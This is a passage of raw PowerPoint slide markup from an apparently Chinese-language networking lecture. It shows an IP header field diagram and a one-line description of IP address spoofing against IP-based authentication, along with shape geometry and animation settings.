          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4975225" y="2657475"/>
            <a:ext cx="3322638" cy="546100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3322647"/>
              <a:gd name="T1" fmla="*/ 0 h 547200"/>
              <a:gd name="T2" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T3" fmla="*/ 0 h 547200"/>
              <a:gd name="T4" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T5" fmla="*/ 536299 h 547200"/>
              <a:gd name="T6" fmla="*/ 0 w 3322647"/>
              <a:gd name="T7" fmla="*/ 536299 h 547200"/>
              <a:gd name="T8" fmla="*/ 0 w 3322647"/>
              <a:gd name="T9" fmla="*/ 0 h 547200"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 3322647"/>
              <a:gd name="T16" fmla="*/ 0 h 547200"/>
              <a:gd name="T17" fmla="*/ 3322647 w 3322647"/>
              <a:gd name="T18" fmla="*/ 547200 h 547200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="3322647" h="547200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3322647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3322647" y="547200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="547200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="39639E"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="39639E"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="77216" rIns="0" bIns="77216"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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址认证的网络服务</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29703" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4975225" y="3203575"/>
            <a:ext cx="3322638" cy="1539875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3322647"/>
              <a:gd name="T1" fmla="*/ 0 h 1538572"/>
              <a:gd name="T2" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T3" fmla="*/ 0 h 1538572"/>
              <a:gd name="T4" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T5" fmla="*/ 1551652 h 1538572"/>
              <a:gd name="T6" fmla="*/ 0 w 3322647"/>
              <a:gd name="T7" fmla="*/ 1551652 h 1538572"/>
              <a:gd name="T8" fmla="*/ 0 w 3322647"/>
              <a:gd name="T9" fmla="*/ 0 h 1538572"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 3322647"/>
              <a:gd name="T16" fmla="*/ 0 h 1538572"/>
              <a:gd name="T17" fmla="*/ 3322647 w 3322647"/>
              <a:gd name="T18" fmla="*/ 1538572 h 1538572"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="3322647" h="1538572">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3322647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3322647" y="1538572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CDD2DE"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="CDD2DE"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="101346" tIns="101346" rIns="135128" bIns="152019"/>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15000"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>假冒可信的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址而非法访问计算机资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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9702"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29702"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29702"/>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 fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29703"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29703"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29703"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29703"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29703"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="297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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="29701" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="29702" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="29703" grpId="0" bldLvl="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95F849B1-26BB-4F50-A8FC-E932EBB2F421}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1917700"/>
            <a:ext cx="936625"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版本号</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5" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="2438400"/>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6" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="2916238"/>
            <a:ext cx="2016125" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787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7 h 434362"/>
              <a:gd name="T12" fmla="*/ 6 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 6 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 6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生存期</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7" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="3394075"/>
            <a:ext cx="8291513" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788 h 434362"/>
              <a:gd name="T2" fmla="*/ 21214 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 72415 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 8221319 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 8272540 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 8293745 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70788 h 434362"/>
              <a:gd name="T12" fmla="*/ 8293745 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 8272540 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 8221319 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424719 h 434362"/>
              <a:gd name="T18" fmla="*/ 72415 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424719 h 434362"/>
              <a:gd name="T20" fmla="*/ 21214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C729"/>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源</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itchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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8" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="3870325"/>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B873"/>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目的</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itchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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9" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="4362450"/>
            <a:ext cx="6192838" cy="434975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 73422 h 434362"/>
              <a:gd name="T2" fmla="*/ 1146 w 8291264"/>
              <a:gd name="T3" fmla="*/ 21504 h 434362"/>
              <a:gd name="T4" fmla="*/ 3912 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 444122 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 446888 w 8291264"/>
              <a:gd name="T9" fmla="*/ 21504 h 434362"/>
              <a:gd name="T10" fmla="*/ 448034 w 8291264"/>
              <a:gd name="T11" fmla="*/ 73422 h 434362"/>
              <a:gd name="T12" fmla="*/ 448034 w 8291264"/>
              <a:gd name="T13" fmla="*/ 367108 h 434362"/>
              <a:gd name="T14" fmla="*/ 446888 w 8291264"/>
              <a:gd name="T15" fmla="*/ 419027 h 434362"/>
              <a:gd name="T16" fmla="*/ 444122 w 8291264"/>
              <a:gd name="T17" fmla="*/ 440531 h 434362"/>
              <a:gd name="T18" fmla="*/ 3912 w 8291264"/>
              <a:gd name="T19" fmla="*/ 440531 h 434362"/>
              <a:gd name="T20" fmla="*/ 1146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选项</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0" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="4826000"/>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9639E"/>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数据</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78858" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>IP协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28682" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732588" y="4362450"/>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填充位</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3" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="2924175"/>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报头校验和</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4" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5651500" y="2420938"/>
            <a:ext cx="3097213" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787 h 434362"/>
              <a:gd name="T2" fmla="*/ 1 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 4 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 435 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 437 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 439 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70787 h 434362"/>
              <a:gd name="T12" fmla="*/ 439 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 437 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 435 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424710 h 434362"/>
              <a:gd name="T18" fmla="*/ 4 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424710 h 434362"/>
              <a:gd name="T20" fmla="*/ 1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分段移位标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(13)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28685" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="1917700"/>
            <a:ext cx="4105275" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788 h 434362"/>
              <a:gd name="T2" fmla="*/ 19 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 64 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 7278 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 7324 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 7342 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70788 h 434362"/>
              <a:gd name="T12" fmla="*/ 7342 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 7324 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 7278 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424719 h 434362"/>
              <a:gd name="T18" fmla="*/ 64 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424719 h 434362"/>
              <a:gd name="T20" fmla="*/ 19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总长度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6" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="2420938"/>
            <a:ext cx="936625" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787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7 h 434362"/>
              <a:gd name="T12" fmla="*/ 0 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 0 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 0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标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28687" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="2924175"/>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协议标识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8" name="Freeform 18"/>
